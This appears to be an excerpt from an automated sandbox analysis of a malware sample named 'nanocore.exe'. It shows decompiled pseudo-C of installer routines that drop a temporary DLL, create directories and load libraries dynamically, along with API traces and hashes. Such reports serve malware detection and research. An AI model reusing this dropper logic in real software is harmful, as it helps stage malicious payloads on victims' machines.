            • Opcode Fuzzy Hash: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
            • Instruction Fuzzy Hash: 8561CE30900215EBDB219F64DE49B9EBBB4BF45714F20813AF900B22E2D7BC9D418B9C
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040179D, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151stringtimeCOMMON
            Download Yara Rule
            C-Code - Quality: 57%
            			E0040179D(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				long _t49;
				long _t62;
				signed char _t63;
				long _t64;
				void* _t66;
				long _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t82;
				CHAR* _t84;
				void* _t87;

				_t77 = __ebx;
				_t84 = E00402A9A(0x31);
				 *(_t87 - 0x34) = _t84;
				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
				_t33 = E00405538(_t84);
				_push(_t84);
				if(_t33 == 0) {
					lstrcatA(E004054CC(E004059BF(0x409c18, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c18);
					E004059BF();
				}
				E00405BFB(0x409c18);
				while(1) {
					__eflags =  *(_t87 + 8) - 3;
					if( *(_t87 + 8) >= 3) {
						_t66 = E00405C94(0x409c18);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t87 - 0x18);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t87 + 8) = _t72;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) == _t77) {
						_t63 = GetFileAttributesA(0x409c18); // executed
						_t64 = _t63 & 0x000000fe;
						__eflags = _t64;
						SetFileAttributesA(0x409c18, _t64); // executed
					}
					__eflags =  *(_t87 + 8) - 1;
					_t41 = E00405690(0x409c18, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t87 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) != _t77) {
						E00404D62(0xffffffe2,  *(_t87 - 0x34));
						__eflags =  *(_t87 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t87 - 4)) = 1;
						}
						L31:
						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t87 - 4));
						__eflags =  *0x7a3008;
						goto L32;
					} else {
						E004059BF(0x40a418, 0x7a4000);
						E004059BF(0x7a4000, 0x409c18);
						E004059E1(_t77, 0x40a418, 0x409c18, "C:\Users\jones\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll",  *((intOrPtr*)(_t87 - 0x10)));
						E004059BF(0x7a4000, 0x40a418);
						_t62 = E004052BF("C:\Users\jones\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll",  *(_t87 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x7a3008 =  *0x7a3008 + 1;
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c18);
								_push(0xfffffffa);
								E00404D62();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404D62(0xffffffea,  *(_t87 - 0x34));
				 *0x4092a0 =  *0x4092a0 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t87 - 8));
				_push( *((intOrPtr*)(_t87 - 0x1c)));
				_t43 = E00402EBD(); // executed
				 *0x4092a0 =  *0x4092a0 - 1;
				__eflags =  *(_t87 - 0x18) - 0xffffffff;
				_t82 = _t43;
				if( *(_t87 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t87 - 8)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffee);
					} else {
						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffe9);
						lstrcatA(0x409c18,  *(_t87 - 0x34));
					}
					_push(0x200010);
					_push(0x409c18);
					E004052BF();
					goto L29;
				}
				goto L33;
			}


















            0x0040179d
            0x004017a4
            0x004017ad
            0x004017b0
            0x004017b3
            0x004017b8
            0x004017c0
            0x004017dc
            0x004017c2
            0x004017c2
            0x004017c3
            0x004017c3
            0x004017e2
            0x004017ec
            0x004017ec
            0x004017f0
            0x004017f3
            0x004017f8
            0x004017fa
            0x004017fc
            0x00401801
            0x00401801
            0x0040180c
            0x0040180c
            0x0040181d
            0x0040181f
            0x0040181f
            0x00401820
            0x00401820
            0x00401823
            0x00401826
            0x00401829
            0x0040182f
            0x0040182f
            0x00401833
            0x00401833
            0x0040183b
            0x0040184a
            0x0040184f
            0x00401852
            0x00401855
            0x00000000
            0x00000000
            0x00401857
            0x0040185a
            0x004018b4
            0x004018b9
            0x004015ca
            0x004026da
            0x004026da
            0x0040292f
            0x00402932
            0x00402932
            0x00000000
            0x0040185c
            0x00401862
            0x0040186d
            0x0040187a
            0x00401885
            0x0040189b
            0x0040189b
            0x0040189e
            0x00000000
            0x004018a4
            0x004018a4
            0x004018a5
            0x004018c2
            0x00402938
            0x00402938
            0x00402938
            0x004018a7
            0x004018a7
            0x004018a8
            0x00401495
            0x00402293
            0x00402293
            0x00402293
            0x004018a5
            0x0040189e
            0x0040293a
            0x0040293e
            0x0040293e
            0x004018d2
            0x004018d7
            0x004018dd
            0x004018de
            0x004018df
            0x004018e2
            0x004018e5
            0x004018ea
            0x004018f0
            0x004018f4
            0x004018f6
            0x004018fe
            0x0040190a
            0x004018f8
            0x004018f8
            0x004018fc
            0x00000000
            0x00000000
            0x004018fc
            0x00401913
            0x00401919
            0x0040191b
            0x00000000
            0x00401921
            0x00401921
            0x00401924
            0x0040193c
            0x00401926
            0x00401929
            0x00401932
            0x00401932
            0x00401941
            0x00401946
            0x0040228e
            0x00000000
            0x0040228e
            0x00000000

            APIs
            • lstrcatA.KERNEL32(00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
            • CompareFileTime.KERNEL32(-00000014,?,Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
            • GetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
            • SetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,00000000), ref: 00401833
              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll$Ivlfdpdlcleoxmzl
            • API String ID: 1152937526-4262345851
            • Opcode ID: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
            • Instruction ID: f975a3bedda6f2933beab8fd4359c2ae6630d988b8a67772af92d786c35f871c
            • Opcode Fuzzy Hash: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
            • Instruction Fuzzy Hash: 0141E471901504BBDF117FA5CD869AF3AA9EF42328B20423BF512F11E1C73C4A41CAAD
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00402EBD, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 173fileCOMMON
            Download Yara Rule
            C-Code - Quality: 95%
            			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t68;
				void* _t69;
				int _t74;
				long _t75;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				void* _t99;
				void* _t100;
				long _t101;
				int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t99 = _a12;
				_v12 = _t102;
				if(_t99 == 0) {
					_v12 = 0x8000;
				}
				_v8 = 0;
				_v16 = _t99;
				if(_t99 == 0) {
					_v16 = 0x78d938;
				}
				_t66 = _a4;
				if(_a4 >= 0) {
					E004030FF( *0x7a2fd8 + _t66);
				}
				_t68 = E004030CD( &_a16, 4); // executed
				if(_t68 == 0) {
					L44:
					_push(0xfffffffd);
					goto L45;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t99 != 0) {
							if(_a16 < _t102) {
								_t102 = _a16;
							}
							if(E004030CD(_t99, _t102) != 0) {
								_v8 = _t102;
								L47:
								return _v8;
							} else {
								goto L44;
							}
						}
						if(_a16 <= 0) {
							goto L47;
						}
						while(1) {
							_t103 = _v12;
							if(_a16 < _t103) {
								_t103 = _a16;
							}
							if(E004030CD(0x789938, _t103) == 0) {
								goto L44;
							}
							_t74 = WriteFile(_a8, 0x789938, _t103,  &_a12, 0); // executed
							if(_t74 == 0 || _t103 != _a12) {
								L30:
								_push(0xfffffffe);
								L45:
								_pop(_t69);
								return _t69;
							} else {
								_v8 = _v8 + _t103;
								_a16 = _a16 - _t103;
								if(_a16 > 0) {
									continue;
								}
								goto L47;
							}
						}
						goto L44;
					}
					_t75 = GetTickCount();
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_v20 = _t75;
					 *0x40b038 = 0xb;
					 *0x40b050 = 0;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L47;
					}
					while(1) {
						L10:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E004030CD(0x789938, _t104) == 0) {
							goto L44;
						}
						_a16 = _a16 - _t104;
						 *0x40b028 = 0x789938;
						 *0x40b02c = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b030 = _t100;
							 *0x40b034 = _v12;
							_t79 = E00405D9D(0x40b028);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b030; // 0x78ed38
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x4092a0 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404D62(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L10;
								}
								goto L47;
							} else {
								if(_a12 != 0) {
									_v12 = _v12 - _t106;
									_v8 = _v8 + _t106;
									_t82 =  *0x40b030; // 0x78ed38
									_v16 = _t82;
									if(_v12 < 1) {
										goto L47;
									}
									L25:
									if(_v28 != 4) {
										continue;
									}
									goto L47;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L30;
								} else {
									_v8 = _v8 + _t106;
									goto L25;
								}
							}
						}
						_push(0xfffffffc);
						goto L45;
					}
					goto L44;
				}
			}



























            0x00402ec5
            0x00402ec9
            0x00402ed0
            0x00402ed3
            0x00402ed5
            0x00402ed5
            0x00402ede
            0x00402ee1
            0x00402ee4
            0x00402ee6
            0x00402ee6
            0x00402eed
            0x00402ef2
            0x00402efd
            0x00402efd
            0x00402f08
            0x00402f0f
            0x004030bb
            0x004030bb
            0x00000000
            0x00402f15
            0x00402f19
            0x0040305e
            0x004030ab
            0x004030ad
            0x004030ad
            0x004030b9
            0x004030c0
            0x004030c3
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004030b9
            0x00403063
            0x00000000
            0x00000000
            0x0040306a
            0x0040306a
            0x00403070
            0x00403072
            0x00403072
            0x0040307e
            0x00000000
            0x00000000
            0x0040308b
            0x00403093
            0x00403058
            0x00403058
            0x004030bd
            0x004030bd
            0x00000000
            0x0040309a
            0x0040309a
            0x0040309d
            0x004030a4
            0x00000000
            0x00000000
            0x00000000
            0x004030a6
            0x00403093
            0x00000000
            0x0040306a
            0x00402f1f
            0x00402f25
            0x00402f25
            0x00402f2c
            0x00402f32
            0x00402f39
            0x00402f3f
            0x00402f42
            0x00000000
            0x00000000
            0x00402f4d
            0x00402f4d
            0x00402f4d
            0x00402f55
            0x00402f57
            0x00402f57
            0x00402f63
            0x00000000
            0x00000000
            0x00402f69
            0x00402f6c
            0x00402f72
            0x00402f78
            0x00402f78
            0x00402f83
            0x00402f89
            0x00402f8e
            0x00402f95
            0x00402f98
            0x00000000
            0x00000000
            0x00402f9e
            0x00402fa4
            0x00402fa6
            0x00402fb3
            0x00402fb5
            0x00402fe3
            0x00402fe9
            0x00402ff2
            0x00402ff7
            0x00402ff7
            0x00402ffe
            0x0040304c
            0x00000000
            0x00000000
            0x00000000
            0x00403000
            0x00403003
            0x00403025
            0x00403028
            0x0040302b
            0x00403034
            0x00403037
            0x00000000
            0x00000000
            0x0040303d
            0x00403041
            0x00000000
            0x00000000
            0x00000000
            0x00403047
            0x00403011
            0x00403019
            0x00000000
            0x00403020
            0x00403020
            0x00000000
            0x00403020
            0x00403019
            0x00402ffe
            0x00403054
            0x00000000
            0x00403054
            0x00000000
            0x00402f4d

            APIs
            • GetTickCount.KERNEL32 ref: 00402F1F
            • GetTickCount.KERNEL32 ref: 00402FA6
            • MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FD3
            • wsprintfA.USER32 ref: 00402FE3
            • WriteFile.KERNELBASE(00000000,00000000,0078ED38,7FFFFFFF,00000000), ref: 00403011
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: CountTick$FileWritewsprintf
            • String ID: ... %d%%$8x
            • API String ID: 4209647438-795837185
            • Opcode ID: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
            • Instruction ID: 8577ea5e15ae9603690e1c5729624cd70e3502ed31cd2bd6b1ef147789401905
            • Opcode Fuzzy Hash: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
            • Instruction Fuzzy Hash: 9E61AB3191220AEBCF10DF65DA48A9F7BB8EB04755F10417BF911B32C0D3789A40CBAA
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02CB11EB, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 350memoryfileCOMMON
            Download Yara Rule
            APIs
            • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02CB1520
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02CB157F
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.669618724.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false
            Similarity
            • API ID: AllocCreateFileVirtual
            • String ID: b1a2f4be1bb040dfae4382b4765a8fb2
            • API String ID: 1475775534-2543734446
            • Opcode ID: 3e9eb696310382312a471573b98bb606ff28a96822e7d8fdb3900a6b8a597b0b
            • Instruction ID: bf149401fb7660f5dc6fb3a2d0fd73a4d39376053a2a554119c0ce443599f169
            • Opcode Fuzzy Hash: 3e9eb696310382312a471573b98bb606ff28a96822e7d8fdb3900a6b8a597b0b
            • Instruction Fuzzy Hash: A9E16931E44388EDEF21CBE4EC15BEDBBB5AF04710F14409AE608FA191D7B50A85DB16
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02CB0719, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
            Download Yara Rule
            APIs
            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02CB081B
            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02CB09E8
            Memory Dump Source
            • Source File: 00000008.00000002.669618724.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false
            Similarity
            • API ID: CreateFileFreeVirtual
            • String ID:
            • API String ID: 204039940-0
            • Opcode ID: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
            • Instruction ID: 300171d7ec85151e9a4f5608d859f949f46ca87c86e6865e1f40e4c4e8d61333
            • Opcode Fuzzy Hash: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
            • Instruction Fuzzy Hash: 41A1FE34D00249EFEF12CFE4D885BEEBBB1AF18316F20845AE515BA2A0D7755A81DF10
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401FDC, Relevance: 9.1, APIs: 6, Instructions: 72libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 64%
            			E00401FDC(int __ebx) {
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t27;
				int _t28;
				struct HINSTANCE__* _t33;
				CHAR* _t35;
				intOrPtr* _t36;
				void* _t37;

				_t28 = __ebx;
				 *(_t37 - 4) = 1;
				SetErrorMode(0x8001); // executed
				if( *0x7a3030 < __ebx) {
					_push(0xffffffe7);
					goto L14;
				} else {
					_t35 = E00402A9A(0xfffffff0);
					 *(_t37 + 8) = E00402A9A(1);
					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
						L3:
						_t20 = LoadLibraryA(_t35); // executed
						_t33 = _t20;
						if(_t33 == _t28) {
							_push(0xfffffff6);
							L14:
							E00401428();
						} else {
							goto L4;
						}
					} else {
						_t27 = GetModuleHandleA(_t35); // executed
						_t33 = _t27;
						if(_t33 != __ebx) {
							L4:
							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
							if(_t36 == _t28) {
								E00404D62(0xfffffff7,  *(_t37 + 8));
							} else {
								 *(_t37 - 4) = _t28;
								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x7a4000, 0x40b018, 0x409000); // executed
								} else {
									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
									if( *_t36() != 0) {
										 *(_t37 - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
								FreeLibrary(_t33);
							}
						} else {
							goto L3;
						}
					}
				}
				SetErrorMode(_t28);
				 *0x7a3008 =  *0x7a3008 +  *(_t37 - 4);
				return 0;
			}










            0x00401fdc
            0x00401fe4
            0x00401fe7
            0x00401ff3
            0x00402093
            0x00000000
            0x00401ff9
            0x00402001
            0x0040200b
            0x0040200e
            0x0040201d
            0x0040201e
            0x00402024
            0x00402028
            0x0040208f
            0x00402095
            0x00402095
            0x00000000
            0x00000000
            0x00000000
            0x00402010
            0x00402011
            0x00402017
            0x0040201b
            0x0040202a
            0x00402034
            0x00402038
            0x0040207c
            0x0040203a
            0x0040203d
            0x00402040
            0x00402070
            0x00402042
            0x00402045
            0x0040204e
            0x00402050
            0x00402050
            0x0040204e
            0x00402040
            0x00402084
            0x00402087
            0x00402087
            0x00000000
            0x00000000
            0x00000000
            0x0040201b
            0x0040200e
            0x0040209b
            0x00402932
            0x0040293e

            APIs
            • SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
            • LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
            • FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
            • SetErrorMode.KERNEL32 ref: 0040209B
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
            • String ID:
            • API String ID: 1609199483-0
            • Opcode ID: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
            • Instruction ID: 46783d0d57a84ebc5ebfcf140bac70f9b04df1374f396a157ff0b90552cbbe62
            • Opcode Fuzzy Hash: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
            • Instruction Fuzzy Hash: 19210B31D04321EBCB216F659E8C95F7A70AF95315B20413BF712B62D1C7BC4A82DA9E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004015D5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
            Download Yara Rule
            C-Code - Quality: 84%
            			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t27;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A9A(0xfffffff0);
				_t27 = E0040555F(_t25);
				if( *_t25 != __ebx && _t27 != __ebx) {
					do {
						_t29 = E004054F7(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L5:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L5;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401428();
				} else {
					E00401428(0xffffffe6);
					E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











            0x004015d5
            0x004015dc
            0x004015e6
            0x004015e8
            0x004015ee
            0x004015f6
            0x004015fc
            0x004015fe
            0x00401601
            0x00401609
            0x00401616
            0x00401623
            0x00401623
            0x00401618
            0x00401619
            0x00401621
            0x00000000
            0x00000000
            0x00401621
            0x00401616
            0x00401626
            0x00401629
            0x0040162b
            0x0040162c
            0x004015ee
            0x00401633
            0x00401653
            0x004021e8
            0x00401635
            0x00401637
            0x00401642
            0x00401648
            0x00401648
            0x00402932
            0x0040293e

            APIs
              • Part of subcall function 0040555F: CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 0040556D
              • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405572
              • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405581
            • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
            • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 0040163D
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
